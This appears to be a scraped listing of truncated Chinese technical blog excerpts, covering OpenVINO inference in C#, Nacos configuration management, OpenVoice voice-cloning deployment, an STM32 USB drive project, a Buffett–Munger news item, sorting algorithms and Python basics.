这段代码是基于 OpenCvSharp, OpenVinoSharp 和 .NET Framework 4.8 的 Windows Forms 应用程序。其主要目的是加载和编译机器学习模型&#xff0c;对输入数据进行推理&#xff0c;并显示结果。 下面是该程序的主要功能和方法的详细总结&#xff1a; 初始化 OpenVINO 运行时核心…

【微服务】配置管理

Nacos配置管理 配置管理配置共享配置热更新 配置管理 将微服务集群中常用&#xff0c;经常变化的配置都写到一个独立的配置文件微服务中进行统一管理 配置共享 在Nacos的界面当中进行配置管理&#xff0c;在配置列表中添加配置 比如各个服务中的jdbc的连接配置&#xff1a; …

【AI工具声音克隆】——OpenVoice一键部署modelScope一键使用

一、声音/音色克隆简介 声音或音色克隆的原理实现步骤主要基于深度学习技术&#xff0c;特别是语音合成和生成模型。以下是声音/音色克隆的大致实现步骤&#xff1a; 数据收集&#xff1a; 收集语音数据&#xff0c;作为模型的训练样本。数据应尽可能多样化&#xff0c;包括不…

基于stm32的USB虚拟U盘+FATFS+W25Q64

基于stm32的USB虚拟U盘FATFSW25Q64 本文目标&#xff1a;基于stm32的USB虚拟U盘FATFSW25Q64 按照本文的描述&#xff0c;简单跑通USB的MSC类来进行简单交互。 先决条件&#xff1a;拥有C语言基础&#xff0c;装有编译和集成的开发环境&#xff0c;比如&#xff1a;Keil uVis…

如果还有机会再跟芒格共度一天,巴菲特想做什么?

这是芒格因离世而缺席的第一年&#xff0c;但他的身影却无处不在。问答环节&#xff0c;巴菲特会不小心脱口而出“查理&#xff0c;该你回答了”&#xff0c;他也称&#xff0c;与芒格在一起的时间比独处要快乐。 可以说&#xff0c;虽然99岁的芒格因离世而缺席了2024年伯克希…

记录几种排序算法

十种常见排序算法可以分类两大类别&#xff1a;比较类排序和非比较类排序。 常见的快速排序、归并排序、堆排序以及冒泡排序等都属于比较类排序算法。比较类排序是通过比较来决定元素间的相对次序&#xff0c;其时间复杂度不能突破 O(nlogn)。在冒泡排序之类的排序中&…

Python基础详解一

一&#xff0c;print打印 print("hello word") print(hello word) 双引号和单引号都可以 二&#xff0c;数据类型 Python中常用的有6种值的类型 输出类型信息 print(type(11)) print(type("22")) print(type(22.2)) <class int> <class str&…